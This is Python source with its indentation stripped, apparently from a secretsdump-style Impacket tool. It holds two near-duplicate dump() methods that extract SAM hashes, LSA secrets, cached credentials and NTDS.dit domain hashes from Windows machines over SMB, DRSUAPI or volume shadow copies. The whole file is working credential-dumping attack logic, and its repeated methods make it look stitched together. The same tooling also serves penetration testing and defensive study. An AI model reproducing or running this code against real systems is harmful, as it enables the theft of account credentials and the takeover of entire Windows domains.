def deleteFile(self, remote_file, share='C$'):
self.con.deleteFile(share, remote_file)
def dump(self):
try:
if self.__remoteName.upper() == 'LOCAL' and self.__username == '':
self.__isRemote = False
self.__useVSSMethod = True
localOperations = LocalOperations(self.__systemHive)
bootKey = localOperations.getBootKey()
if self.__ntdsFile is not None:
# Let's grab target's configuration about LM Hashes storage
self.__noLMHash = localOperations.checkNoLMHashPolicy()
else:
self.__isRemote = True
bootKey = None
try:
try:
self.connect()
except:
if os.getenv(
'KRB5CCNAME'
) is not None and self.__doKerberos is True:
# SMBConnection failed. That might be because there was no way to log into the
# target system. We just have a last resort. Hope we have tickets cached and that they
# will work
logging.debug(
'SMBConnection didn\'t work, hoping Kerberos will help'
)
pass
else:
raise
self.__remoteOps = RemoteOperations(
self.__smbConnection, self.__doKerberos,
self.__kdcHost)
self.__remoteOps.setExecMethod(self.__execMethod)
if self.__justDC is False and self.__justDCNTLM is False or self.__useVSSMethod is True:
self.__remoteOps.enableRegistry()
bootKey = self.__remoteOps.getBootKey()
# Let's check whether target system stores LM Hashes
self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy(
)
except Exception as e:
self.__canProcessSAMLSA = False
if str(e).find('STATUS_USER_SESSION_DELETED') and os.getenv('KRB5CCNAME') is not None \
and self.__doKerberos is True:
# Giving some hints here when SPN target name validation is set to something different to Off
# This will prevent establishing SMB connections using TGS for SPNs different to cifs/
logging.error(
'Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user'
)
else:
logging.error('RemoteOperations failed: %s' % str(e))
# If RemoteOperations succeeded, then we can extract SAM and LSA
if self.__justDC is False and self.__justDCNTLM is False and self.__canProcessSAMLSA:
try:
if self.__isRemote is True:
SAMFileName = self.__remoteOps.saveSAM()
else:
SAMFileName = self.__samHive
self.__SAMHashes = SAMHashes(
SAMFileName,
bootKey,
isRemote=self.__isRemote,
perSecretCallback=self.perSecretCallback1)
self.__SAMHashes.dump()
if self.__outputFileName is not None:
self.__SAMHashes.export(self.__outputFileName)
except Exception as e:
logging.error('SAM hashes extraction failed: %s' % str(e))
try:
if self.__isRemote is True:
SECURITYFileName = self.__remoteOps.saveSECURITY()
else:
SECURITYFileName = self.__securityHive
self.__LSASecrets = LSASecrets(
SECURITYFileName,
bootKey,
self.__remoteOps,
isRemote=self.__isRemote,
history=self.__history,
perSecretCallback=self.perSecretCallback2)
self.__LSASecrets.dumpCachedHashes()
if self.__outputFileName is not None:
self.__LSASecrets.exportCached(self.__outputFileName)
self.__LSASecrets.dumpSecrets()
if self.__outputFileName is not None:
self.__LSASecrets.exportSecrets(self.__outputFileName)
except Exception as e:
logging.error('LSA hashes extraction failed: %s' % str(e),
exc_info=True)
# NTDS Extraction we can try regardless of RemoteOperations failing. It might still work
if self.__isRemote is True:
if self.__useVSSMethod and self.__remoteOps is not None:
NTDSFileName = self.__remoteOps.saveNTDS()
else:
NTDSFileName = None
else:
NTDSFileName = self.__ntdsFile
self.__NTDSHashes = NTDSHashes(
NTDSFileName,
bootKey,
isRemote=self.__isRemote,
history=self.__history,
noLMHash=self.__noLMHash,
remoteOps=self.__remoteOps,
useVSSMethod=self.__useVSSMethod,
justNTLM=self.__justDCNTLM,
pwdLastSet=self.__pwdLastSet,
resumeSession=self.__resumeFileName,
outputFileName=self.__outputFileName,
justUser=self.__justUser,
printUserStatus=self.__printUserStatus,
perSecretCallback=self.perSecretCallback2)
try:
self.__NTDSHashes.dump()
except Exception as e:
if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:
# We don't store the resume file if this error happened, since this error is related to lack
# of enough privileges to access DRSUAPI.
resumeFile = self.__NTDSHashes.getResumeSessionFile()
if resumeFile is not None:
os.unlink(resumeFile)
logging.error(e, exc_info=True)
if self.__justUser and str(e).find(
"ERROR_DS_NAME_ERROR_NOT_UNIQUE") >= 0:
logging.info(
"You just got that error because there might be some duplicates of the same name. "
"Try specifying the domain name for the user as well. It is important to specify it "
"in the form of NetBIOS domain name/user (e.g. contoso/Administratror)."
)
elif self.__useVSSMethod is False:
logging.info(
'Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter'
)
self.cleanup()
except (Exception, KeyboardInterrupt) as e:
logging.error(e, exc_info=True)
try:
self.cleanup()
except:
pass
def dump(self):
try:
if self.__remoteName.upper() == 'LOCAL' and self.__username == '':
self.__isRemote = False
self.__useVSSMethod = True
if self.__systemHive:
localOperations = LocalOperations(self.__systemHive)
bootKey = localOperations.getBootKey()
else:
self.__isRemote = True
bootKey = None
try:
try:
self.connect()
except Exception as e:
raise
self.__remoteOps = RemoteOperations(
self.__smbConnection, False)
self.__remoteOps.setExecMethod(None)
if self.__justDC is False or self.__useVSSMethod is True:
self.__remoteOps.enableRegistry()
bootKey = self.__remoteOps.getBootKey()
# Let's check whether target system stores LM Hashes
self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy(
)
except Exception as e:
self.__canProcessSAMLSA = False
if str(e).find('STATUS_USER_SESSION_DELETED'
) and os.getenv('KRB5CCNAME') is not None:
# Giving some hints here when SPN target name validation is set to something different to Off
# This will prevent establishing SMB connections using TGS for SPNs different to cifs/
logging.error(
'Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user'
)
else:
logging.error('RemoteOperations failed: %s' % str(e))
# If RemoteOperations succeeded, then we can extract SAM and LSA
if self.__justDC is False and self.__canProcessSAMLSA:
try:
if self.__isRemote is True:
SAMFileName = self.__remoteOps.saveSAM()
else:
SAMFileName = self.__samHive
self.__SAMHashes = SAMHashes(SAMFileName,
bootKey,
isRemote=self.__isRemote)
self.__SAMHashes.dump()
if self.__outputFileName is not None:
self.__SAMHashes.export(self.__outputFileName)
except Exception as e:
logging.error('SAM hashes extraction failed: %s' % str(e))
try:
if self.__isRemote is True:
SECURITYFileName = self.__remoteOps.saveSECURITY()
else:
SECURITYFileName = self.__securityHive
self.__LSASecrets = LSASecrets(SECURITYFileName,
bootKey,
self.__remoteOps,
isRemote=self.__isRemote)
self.__LSASecrets.dumpCachedHashes()
if self.__outputFileName is not None:
self.__LSASecrets.exportCached(self.__outputFileName)
self.__LSASecrets.dumpSecrets()
if self.__outputFileName is not None:
self.__LSASecrets.exportSecrets(self.__outputFileName)
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error('LSA hashes extraction failed: %s' % str(e))
# NTDS Extraction we can try regardless of RemoteOperations failing. It might still work
if self.__isRemote is True:
if self.__useVSSMethod and self.__remoteOps is not None:
NTDSFileName = self.__remoteOps.saveNTDS()
else:
NTDSFileName = None
else:
NTDSFileName = self.__ntdsFile
self.__NTDSHashes = NTDSHashes(
NTDSFileName,
bootKey,
isRemote=self.__isRemote,
noLMHash=self.__noLMHash,
remoteOps=self.__remoteOps,
useVSSMethod=self.__useVSSMethod,
outputFileName=self.__outputFileName)
try:
self.__NTDSHashes.dump()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:
# We don't store the resume file if this error happened, since this error is related to lack
# of enough privileges to access DRSUAPI.
resumeFile = self.__NTDSHashes.getResumeSessionFile()
if resumeFile is not None:
os.unlink(resumeFile)
logging.error(e)
if self.__useVSSMethod is False:
logging.info(
'Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter'
)
self.cleanup()
except (Exception, KeyboardInterrupt) as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(e)
if self.__NTDSHashes is not None:
if isinstance(e, KeyboardInterrupt):
while True:
answer = input("Delete resume session file? [y/N] ")
if answer.upper() == '':
answer = 'N'
break
elif answer.upper() == 'Y':
answer = 'Y'
break
elif answer.upper() == 'N':
answer = 'N'
break
if answer == 'Y':
resumeFile = self.__NTDSHashes.getResumeSessionFile()
if resumeFile is not None:
os.unlink(resumeFile)
try:
self.cleanup()
except:
pass
